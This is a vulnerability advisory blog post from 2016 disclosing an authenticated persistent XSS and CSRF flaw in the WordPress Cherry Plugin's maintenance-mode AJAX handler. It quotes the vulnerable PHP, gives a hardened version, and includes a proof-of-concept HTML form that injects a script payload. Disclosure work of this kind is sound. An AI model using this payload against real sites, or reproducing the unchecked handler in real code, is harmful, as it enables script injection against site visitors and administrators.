30 Jun 2016

Authenticated Persistent Cross-Site Scripting (XSS) Vulnerability in Cherry Plugin

As we continue looking at ways we can improve the security of WordPress plugins, one of the things we are trying is checking over plugins for which we have recently added new vulnerabilities to our data set, to see if we can find any other obvious vulnerabilities. The third we have spotted is in the plugin Cherry Plugin.

We recently added two vulnerabilities to our data set that existed in older versions of the plugin, both caused by code that was only intended to be used by Administrator level users being accessible to anyone (you didn’t even have to be logged in). The vulnerability we found shows that the developers are still having problems with properly restricting access in the plugin. In this case the function cherry_mtc_save(), which is located in the file /includes/plugin-assets.php, is made accessible to any logged in user through an AJAX request. Since it is only used through the Maintenance Mode page for the plugin, which is only accessible to Administrators, the function should have restrictions to prevent lower level users from accessing it. That isn’t the case:

function cherry_mtc_save() {
	$post_date = isset($data) ? $data : $_POST['data'];
	update_option('mtc_options', $post_date);
	exit();
}

You can see that there is also no nonce check in the function, so the function can also be exploited through cross-site request forgery (CSRF).

The function saves changes to the settings for the plugin’s maintenance mode. With that, a lower level user could turn on the plugin’s maintenance mode, which would be a nuisance on its own. But the real security risk comes from the fact that they can set the description shown on the maintenance mode page to include JavaScript code, meaning there is a persistent cross-site scripting (XSS) vulnerability.

You can see that no sanitization is done when the settings are saved, and no escaping is done when the value is output in the file /includes/plugin-under-construction-content.php:

if(isset($mtc_options['mtc_mode_description'])){ ?>
	<p id="under_construction_description"><?php echo stripslashes( $mtc_options['mtc_mode_description'] ); ?></p>

It isn’t clear if the developer intended for Administrators to use JavaScript in that field or if they just hadn’t bothered to sanitize or escape the value.
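For comparison, here is how the handler and the output could be hardened against all three issues (missing capability check, missing nonce check, missing sanitization/escaping). This is an added example, not the plugin’s own code; it assumes the handler is registered on the wp_ajax_mtc_save hook (as the action=mtc_save parameter implies) and uses a nonce action name, cherry_mtc_save, chosen for this example.

```php
<?php
// Added example, not code from Cherry Plugin. Assumes the handler is hooked to
// 'wp_ajax_mtc_save' and that the Maintenance Mode page sends a nonce created
// with wp_create_nonce( 'cherry_mtc_save' ) in a POST field named 'security'.

// Only accept the settings we know about, each run through a sanitizer,
// instead of storing whatever arrives in $_POST['data'].
function cherry_mtc_sanitize_options( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();
    // Maintenance mode flag: coerce to a strict 0/1 value.
    $clean['mtc_mode_on'] = empty( $input['mtc_mode_on'] ) ? 0 : 1;
    // Description: keep only the HTML WordPress allows in post content.
    // wp_kses_post() drops <script> tags and on* event attributes, so the
    // payload from the proof of concept cannot be stored as executable markup.
    $clean['mtc_mode_description'] = isset( $input['mtc_mode_description'] )
        ? wp_kses_post( wp_unslash( $input['mtc_mode_description'] ) )
        : '';
    return $clean;
}

function cherry_mtc_save() {
    // 1. CSRF: require a valid nonce; check_ajax_referer() dies on failure.
    check_ajax_referer( 'cherry_mtc_save', 'security' );

    // 2. Authorization: the Maintenance Mode page is Administrator-only, so
    //    require the matching capability rather than just a logged-in session.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }

    // 3. Input validation: sanitize before the value reaches update_option().
    $data = isset( $_POST['data'] ) ? $_POST['data'] : array();
    update_option( 'mtc_options', cherry_mtc_sanitize_options( $data ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_mtc_save', 'cherry_mtc_save' );

// Output side (plugin-under-construction-content.php equivalent): escape at
// the point of echo as well, so a stored value is never trusted on its own.
// Use esc_html() instead if Administrators are not meant to use HTML here.
$mtc_options = get_option( 'mtc_options', array() );
if ( isset( $mtc_options['mtc_mode_description'] ) ) { ?>
    <p id="under_construction_description"><?php echo wp_kses_post( $mtc_options['mtc_mode_description'] ); ?></p>
<?php }
```

Sanitizing on save protects the stored option; escaping on output protects the page even if a value was stored before the fix or through another code path.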

Proof of Concept

The following proof of concept will turn on the maintenance mode and display an alert reading “XSS” when submitted while logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="mtc_save" />
<input type="hidden" name="data[mtc_mode_on]" value="1" />
<input type="hidden" name="data[mtc_mode_description]" value='/><script>alert("XSS");</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/23/2016 – Developer notified.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
